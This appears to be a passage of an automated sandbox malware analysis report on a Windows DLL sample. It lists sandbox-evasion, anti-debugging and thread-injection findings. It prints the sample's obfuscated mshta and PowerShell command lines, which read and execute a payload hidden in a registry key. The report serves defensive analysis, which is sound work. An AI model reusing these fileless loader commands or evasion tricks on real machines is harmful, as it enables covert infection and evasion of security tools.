Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4400 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088 Thread sleep count: 5638 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088 Thread sleep count: 3533 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6408 Thread sleep count: 5347 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5328 Thread sleep count: 3944 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5348 Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2888 Thread sleep count: 5671 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2888 Thread sleep count: 3636 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4968 Thread sleep time: -8301034833169293s >= -30000s
Found evasive API chain (date check)
Source: C:\Windows\System32\loaddll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.dll
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4780
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1593
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5638
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3533
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5347
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3944
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5671
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3636
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\loaddll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B08B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_03B08B0F
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B10219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_03B10219
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B016BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_03B016BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E16BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 4_2_048E16BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F0219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 4_2_048F0219
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E8B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 4_2_048E8B0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_059116BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 5_2_059116BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05918B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 5_2_05918B0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05920219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 5_2_05920219
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A0219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 6_2_009A0219
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00998B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 6_2_00998B0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009916BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 6_2_009916BA
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B08F03 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_03B08F03
Source: mshta.exe, 00000021.00000003.374607061.00000121EDD21000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}w
Source: control.exe, 00000030.00000002.420216266.000002031134E000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B039B2 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 1_2_03B039B2
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0CE8 mov eax, dword ptr fs:[00000030h] 1_2_00FE0CE8
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0A64 mov eax, dword ptr fs:[00000030h] 1_2_00FE0A64
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0C57 mov eax, dword ptr fs:[00000030h] 1_2_00FE0C57
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0BFC mov eax, dword ptr fs:[00000030h] 1_2_00FE0BFC
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0B14 mov eax, dword ptr fs:[00000030h] 1_2_00FE0B14
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960CE8 mov eax, dword ptr fs:[00000030h] 4_2_00960CE8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960C57 mov eax, dword ptr fs:[00000030h] 4_2_00960C57
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960A64 mov eax, dword ptr fs:[00000030h] 4_2_00960A64
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960BFC mov eax, dword ptr fs:[00000030h] 4_2_00960BFC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960B14 mov eax, dword ptr fs:[00000030h] 4_2_00960B14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0B14 mov eax, dword ptr fs:[00000030h] 5_2_031C0B14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0BFC mov eax, dword ptr fs:[00000030h] 5_2_031C0BFC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0C57 mov eax, dword ptr fs:[00000030h] 5_2_031C0C57
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0A64 mov eax, dword ptr fs:[00000030h] 5_2_031C0A64
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0CE8 mov eax, dword ptr fs:[00000030h] 5_2_031C0CE8
Checks if the current process is being debugged
Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\regsvr32.exe Process queried: DebugPort
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B02ABE StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 1_2_03B02ABE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E2ABE StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 4_2_048E2ABE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05912ABE StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 5_2_05912ABE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00992ABE StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 6_2_00992ABE

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: unknown protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6912712E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6912712E0 Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3352
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: 8DCB1580
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
